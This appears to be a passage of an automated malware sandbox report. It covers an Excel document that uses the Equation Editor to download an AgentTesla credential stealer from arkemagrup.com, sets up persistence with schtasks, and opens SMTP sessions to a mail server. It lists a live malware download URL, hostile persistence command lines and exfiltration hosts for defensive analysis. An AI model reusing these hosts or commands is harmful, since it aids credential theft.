                                                                                      Jul 22, 2021 18:12:31.264373064 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264374018 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264408112 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264409065 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264444113 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264463902 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264477015 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264492989 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264513016 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264518023 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264549971 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264553070 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264585018 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264586926 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264620066 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264621973 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264657021 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264689922 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264693975 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264695883 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264731884 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264733076 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264765978 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264767885 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264802933 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264805079 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264839888 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264863014 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264874935 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264950037 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264955044 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.267203093 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.323107958 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.323168039 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.323250055 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324438095 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324722052 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324742079 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324757099 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324786901 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324807882 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324830055 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324832916 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324851990 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324870110 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324873924 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324877024 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324877024 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324896097 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324898958 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324920893 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324938059 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324942112 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324944019 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324959040 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.324964046 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324985027 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.324985027 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.325006962 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325027943 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325031042 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.325052023 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325073957 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325094938 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325114965 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325119019 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.325138092 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325159073 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325180054 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325201988 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325225115 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.325247049 CEST8049165185.26.106.165192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 22, 2021 18:12:30.965214014 CEST5219753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:12:31.022859097 CEST53521978.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.023108959 CEST5219753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:12:31.081767082 CEST53521978.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:36.833220005 CEST5309953192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:36.891352892 CEST53530998.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:37.990926981 CEST5283853192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:38.042025089 CEST53528388.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:38.055355072 CEST6120053192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:38.113610983 CEST53612008.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:38.116096020 CEST6120053192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:38.174209118 CEST53612008.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:38.998492956 CEST4954853192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:39.056665897 CEST53495488.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:39.065907955 CEST4954853192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:39.122867107 CEST53495488.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:40.309792995 CEST5562753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:40.369712114 CEST53556278.8.8.8192.168.2.22
                                                                                      Jul 22, 2021 18:13:40.370260000 CEST5562753192.168.2.228.8.8.8
                                                                                      Jul 22, 2021 18:13:40.433701992 CEST53556278.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jul 22, 2021 18:12:30.965214014 CEST192.168.2.228.8.8.80xe4c3Standard query (0)arkemagrup.comA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:12:31.023108959 CEST192.168.2.228.8.8.80xe4c3Standard query (0)arkemagrup.comA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:36.833220005 CEST192.168.2.228.8.8.80xca08Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:38.998492956 CEST192.168.2.228.8.8.80x97f4Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.065907955 CEST192.168.2.228.8.8.80x97f4Standard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.309792995 CEST192.168.2.228.8.8.80xbefaStandard query (0)mail.spamora.netA (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.370260000 CEST192.168.2.228.8.8.80xbefaStandard query (0)mail.spamora.netA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jul 22, 2021 18:12:31.022859097 CEST8.8.8.8192.168.2.220xe4c3No error (0)arkemagrup.com185.26.106.165A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:12:31.081767082 CEST8.8.8.8192.168.2.220xe4c3No error (0)arkemagrup.com185.26.106.165A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:36.891352892 CEST8.8.8.8192.168.2.220xca08No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.056665897 CEST8.8.8.8192.168.2.220x97f4No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:39.122867107 CEST8.8.8.8192.168.2.220x97f4No error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.369712114 CEST8.8.8.8192.168.2.220xbefaNo error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)
                                                                                      Jul 22, 2021 18:13:40.433701992 CEST8.8.8.8192.168.2.220xbefaNo error (0)mail.spamora.net185.26.106.194A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • arkemagrup.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249165185.26.106.16580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jul 22, 2021 18:12:31.154568911 CEST0OUTGET /Doc_87654334567.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: arkemagrup.com
                                                                                      Connection: Keep-Alive
                                                                                      Jul 22, 2021 18:12:31.209455013 CEST1INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 22 Jul 2021 16:12:31 GMT
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Content-Length: 479232
                                                                                      Last-Modified: Thu, 22 Jul 2021 13:40:55 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "60f97567-75000"
                                                                                      X-Powered-By: PleskLin
                                                                                      Accept-Ranges: bytes


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Jul 22, 2021 18:13:37.027579069 CEST58749166185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.028069973 CEST49166587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:37.085000038 CEST58749166185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.085051060 CEST58749166185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:37.086252928 CEST49166587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:37.140757084 CEST58749166185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS
                                                                                      Jul 22, 2021 18:13:37.767450094 CEST58749167185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.767843962 CEST49167587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:37.824126959 CEST58749167185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:37.824220896 CEST58749167185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:37.824469090 CEST49167587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:37.879425049 CEST58749167185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS
                                                                                      Jul 22, 2021 18:13:39.233465910 CEST58749169185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.547199011 CEST58749170185.26.106.194192.168.2.22220-mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.547725916 CEST49170587192.168.2.22185.26.106.194EHLO 760639
                                                                                      Jul 22, 2021 18:13:40.603985071 CEST58749170185.26.106.194192.168.2.22220 mail.spamora.net ESMTP Postfix (Debian/GNU)
                                                                                      Jul 22, 2021 18:13:40.604139090 CEST58749170185.26.106.194192.168.2.22250-mail.spamora.net
                                                                                      250-PIPELINING
                                                                                      250-SIZE 80000000
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 DSN
                                                                                      Jul 22, 2021 18:13:40.604568005 CEST49170587192.168.2.22185.26.106.194STARTTLS
                                                                                      Jul 22, 2021 18:13:40.659290075 CEST58749170185.26.106.194192.168.2.22220 2.0.0 Ready to start TLS

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time:18:11:46
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase:0x13ff10000
                                                                                      File size:27641504 bytes
                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:08
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:10
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x10720000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 13%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:12:44
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                                                                                      Imagebase:0xb70000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:12:46
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10720000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:14
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 13%, ReversingLabs
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:22
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:18:13:34
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                                                                                      Imagebase:0x280000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:18:13:34
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                                                                                      Imagebase:0x280000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:18:13:35
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, Author: Joe Security

                                                                                      General

                                                                                      Start time:18:13:35
                                                                                      Start date:22/07/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:{path}
                                                                                      Imagebase:0x10fc0000
                                                                                      File size:479232 bytes
                                                                                      MD5 hash:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, Author: Joe Security

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >